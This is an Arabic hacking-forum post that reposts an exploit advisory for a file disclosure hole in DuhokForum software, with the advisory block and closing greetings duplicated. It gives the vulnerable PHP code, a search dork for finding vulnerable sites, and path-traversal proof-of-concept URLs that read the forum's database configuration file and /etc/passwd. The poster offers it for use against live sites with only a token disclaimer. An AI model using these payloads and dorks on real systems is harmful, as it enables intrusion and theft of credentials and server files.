تغرةة منتديــآت (DuhokForum ( File Disclosure ...**!!
الســلآم عليــكم ورٍحمـــة اللــــــه وبرٍكـــآته
كيفكم يا شباب مرحبا بكم في موضوعي متواضع
حبيت اطرحلــكم ثغرٍهـ مكتشفهـآ من ثلاث او اربع آيـــآم ..< مدري اذا في احد مكتشفهــآ قبلي
وهي ثغرهـ بمنتديــآت DuhokForum من نوع File Disclosure ..< قرآءة ملفــآت
بس المشكلــه كلهــــــآ مواقع عربيــه ..< يعني ترىآ ابري ذمتي من يستخدمهــآ بمواقع عربيه مسالمه
سورٍس الثغــــــــــرٍهـ
================================================
DuhokForum <= Remote File Disclosure Vulnerability
================================================
[+] DuhokForum <= Remote File Disclosure Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> 0
0 \/___/ 1
1 1
0 [+] Site : wWw.Sa-HaCKeR.cOm 0
1 [+] Support e-mail : AgRaMkSa[at]w.cn 1
0 0
1 ###################################### 1
0 M...Q...S Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: DarK c0d3r
[+] Download:http://www.4shared.com/file/117673973/65c6e652/DUHOK_FORUM12_BY_TEAM_SATRTIMES.html
[+] Greetz: TiGeR HaCKeR . Mr.SHankeR
[+] Code:
if($file == "box_Table.htm"){
$filename = "box_Table.htm";
}
header('Content-type: text/html');
header('Content-transfer-encoding: binary');
header("Cache-Control: must-revalidate");
header($ExpStr);
readfile($filename);
=======================================
DorK : "inurl:index.php?mode=members"
[+] PoC: Http://site/paTH/editor/file.php?filename=../include/connect.php <===== config
[+] PoC: Http://site/paTH/editor/file.php?filename=../../../../../../etc/passwd
====================================================================
كيفكم يا شباب مرحبا بكم في موضوعي متواضع
حبيت اطرحلــكم ثغرٍهـ مكتشفهـآ من ثلاث او اربع آيـــآم ..< مدري اذا في احد مكتشفهــآ قبلي
وهي ثغرهـ بمنتديــآت DuhokForum من نوع File Disclosure ..< قرآءة ملفــآت
بس المشكلــه كلهــــــآ مواقع عربيــه ..< يعني ترىآ ابري ذمتي من يستخدمهــآ بمواقع عربيه مسالمه
سورٍس الثغــــــــــرٍهـ
================================================
DuhokForum <= Remote File Disclosure Vulnerability
================================================
[+] DuhokForum <= Remote File Disclosure Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> 0
0 \/___/ 1
1 1
0 [+] Site : wWw.Sa-HaCKeR.cOm 0
1 [+] Support e-mail : AgRaMkSa[at]w.cn 1
0 0
1 ###################################### 1
0 M...Q...S Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: DarK c0d3r
[+] Download:http://www.4shared.com/file/117673973/65c6e652/DUHOK_FORUM12_BY_TEAM_SATRTIMES.html
[+] Greetz: TiGeR HaCKeR . Mr.SHankeR
[+] Code:
if($file == "box_Table.htm"){
$filename = "box_Table.htm";
}
header('Content-type: text/html');
header('Content-transfer-encoding: binary');
header("Cache-Control: must-revalidate");
header($ExpStr);
readfile($filename);
=======================================
DorK : "inurl:index.php?mode=members"
[+] PoC: Http://site/paTH/editor/file.php?filename=../include/connect.php <===== config
[+] PoC: Http://site/paTH/editor/file.php?filename=../../../../../../etc/passwd
====================================================================
شرٍح فيديوٍ لثغــــــرٍهـ علىآ السرٍيع
هنــــــــــــــآ
انتظرو الثــآنيــــه بآذن اللــــــــــــــــــه ..> لا لا للبرٍآيفت
See you
منقول من الاخ
DaRk-C0d3r
الاهداء
M!M0 ==ملك الاختراقات
VoLc4n0#####
NEVER HaCKEr
ولجميع اعضاء شبكة العنكبوتية
هنــــــــــــــآ
انتظرو الثــآنيــــه بآذن اللــــــــــــــــــه ..> لا لا للبرٍآيفت
See you
منقول من الاخ
DaRk-C0d3r
الاهداء
M!M0 ==ملك الاختراقات
VoLc4n0#####
NEVER HaCKEr
ولجميع اعضاء شبكة العنكبوتية
التعديل الأخير:
اسم الموضوع : تغرةة منتديــآت (DuhokForum ( File Disclosure ...**!!
|
المصدر : SQL قواعد البيانات